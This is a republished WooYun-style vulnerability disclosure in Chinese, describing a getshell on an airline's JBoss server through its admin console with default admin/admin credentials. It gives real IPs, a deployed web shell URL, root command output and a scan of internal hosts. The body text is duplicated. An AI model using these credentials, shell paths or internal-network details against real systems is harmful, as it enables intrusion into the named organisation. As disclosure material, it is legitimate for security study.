神刀安全网

漏洞标题: 九元航空某管理系统Getshell(涉及管理系统与内网办公系统)

漏洞详情

披露状态:

2016-04-16: 细节已通知厂商并且等待厂商处理中
2016-04-16: 厂商已经确认,细节仅向厂商公开
2016-04-26: 细节向核心白帽子及相关领域专家公开
2016-05-06: 细节向普通白帽子公开
2016-05-16: 细节向实习白帽子公开
2016-05-31: 细节向公众公开

简要描述:

RT

详细说明:

九元航空某管理系统Getshell(涉及管理系统与内网办公系统)

地址:http://219.135.189.180:8090/admin-console/secure/summary.seam?path=-3%2FApplications%2FWeb+Application+%28WAR%29&conversationId=176

服务器上有4个系统:http://219.135.189.180:8081/login/Login.jsp?logintype=1

与网上准备系统:http://219.135.189.180:89/login.do

漏洞标题:  九元航空某管理系统Getshell(涉及管理系统与内网办公系统)

漏洞标题:  九元航空某管理系统Getshell(涉及管理系统与内网办公系统)

漏洞出在JBOSS上面:

http://219.135.189.180:8090/admin-console/ 密码 admin admin

对sertve有过加固。admin-console可以拿shell

部署拿shell:

漏洞标题:  九元航空某管理系统Getshell(涉及管理系统与内网办公系统)

shell 地址:http://219.135.189.180:8090/is/index.jsp

漏洞标题:  九元航空某管理系统Getshell(涉及管理系统与内网办公系统)

处与内网:

code 区域
[/usr/local/jboss-soa-p-5/jboss-as/server/default/tmp/3j001-8lh1lj-ilbvbxvi-1-in20r4rk-42h2/is.war/]$ whoami
root


[/usr/local/jboss-soa-p-5/jboss-as/server/default/tmp/3j001-8lh1lj-ilbvbxvi-1-in20r4rk-42h2/is.war/]$ nnetstat -ano

/bin/sh: nnetstat: command not found

[/usr/local/jboss-soa-p-5/jboss-as/server/default/tmp/3j001-8lh1lj-ilbvbxvi-1-in20r4rk-42h2/is.war/]$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:B2:48:BC
inet addr:10.10.2.21 Bcast:10.10.2.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:feb2:48bc/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:13521015 errors:0 dropped:0 overruns:0 frame:0
TX packets:1483001 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3390175969 (3.1 GiB) TX bytes:334624396 (319.1 MiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:19660695 errors:0 dropped:0 overruns:0 frame:0
TX packets:19660695 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:3025987335 (2.8 GiB) TX bytes:3025987335 (2.8 GiB)

漏洞标题:  九元航空某管理系统Getshell(涉及管理系统与内网办公系统)

内网同段有多个系统:

code 区域
http://10.10.2.9 >> >>Apache-Coyote/1.1 >>Success
http://10.10.2.14 >> 九元航空安全管理系统>>Apache-Coyote/1.1 >>Success
http://10.10.2.27 >> 餐食信息>>Apache-Coyote/1.1 >>Success
http://10.10.2.6 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.10.2.15 >> >>MoxaHttp/1.0 >>Success
http://10.10.2.17 >> IIS7>>Microsoft-IIS/7.0 >>Success
http://10.10.2.24 >> >>Apache >>Success
http://10.10.2.25 >> IIS7>>Microsoft-IIS/7.0 >>Success

漏洞证明:

九元航空某管理系统Getshell(涉及管理系统与内网办公系统)

地址:http://219.135.189.180:8090/admin-console/secure/summary.seam?path=-3%2FApplications%2FWeb+Application+%28WAR%29&conversationId=176

服务器上有4个系统:http://219.135.189.180:8081/login/Login.jsp?logintype=1

与网上准备系统:http://219.135.189.180:89/login.do

漏洞标题:  九元航空某管理系统Getshell(涉及管理系统与内网办公系统)

漏洞标题:  九元航空某管理系统Getshell(涉及管理系统与内网办公系统)

漏洞出在JBOSS上面:

http://219.135.189.180:8090/admin-console/ 密码 admin admin

对sertve有过加固。admin-console可以拿shell

部署拿shell:

漏洞标题:  九元航空某管理系统Getshell(涉及管理系统与内网办公系统)

shell 地址:http://219.135.189.180:8090/is/index.jsp

漏洞标题:  九元航空某管理系统Getshell(涉及管理系统与内网办公系统)

处与内网:

code 区域
[/usr/local/jboss-soa-p-5/jboss-as/server/default/tmp/3j001-8lh1lj-ilbvbxvi-1-in20r4rk-42h2/is.war/]$ whoami
root


[/usr/local/jboss-soa-p-5/jboss-as/server/default/tmp/3j001-8lh1lj-ilbvbxvi-1-in20r4rk-42h2/is.war/]$ nnetstat -ano

/bin/sh: nnetstat: command not found

[/usr/local/jboss-soa-p-5/jboss-as/server/default/tmp/3j001-8lh1lj-ilbvbxvi-1-in20r4rk-42h2/is.war/]$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:B2:48:BC
inet addr:10.10.2.21 Bcast:10.10.2.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:feb2:48bc/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:13521015 errors:0 dropped:0 overruns:0 frame:0
TX packets:1483001 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3390175969 (3.1 GiB) TX bytes:334624396 (319.1 MiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:19660695 errors:0 dropped:0 overruns:0 frame:0
TX packets:19660695 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:3025987335 (2.8 GiB) TX bytes:3025987335 (2.8 GiB)

漏洞标题:  九元航空某管理系统Getshell(涉及管理系统与内网办公系统)

内网同段有多个系统:

code 区域
http://10.10.2.9 >> >>Apache-Coyote/1.1 >>Success
http://10.10.2.14 >> 九元航空安全管理系统>>Apache-Coyote/1.1 >>Success
http://10.10.2.27 >> 餐食信息>>Apache-Coyote/1.1 >>Success
http://10.10.2.6 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.10.2.15 >> >>MoxaHttp/1.0 >>Success
http://10.10.2.17 >> IIS7>>Microsoft-IIS/7.0 >>Success
http://10.10.2.24 >> >>Apache >>Success
http://10.10.2.25 >> IIS7>>Microsoft-IIS/7.0 >>Success

修复方案:

版权声明:转载请注明来源 艺术家@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 九元航空某管理系统Getshell(涉及管理系统与内网办公系统)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址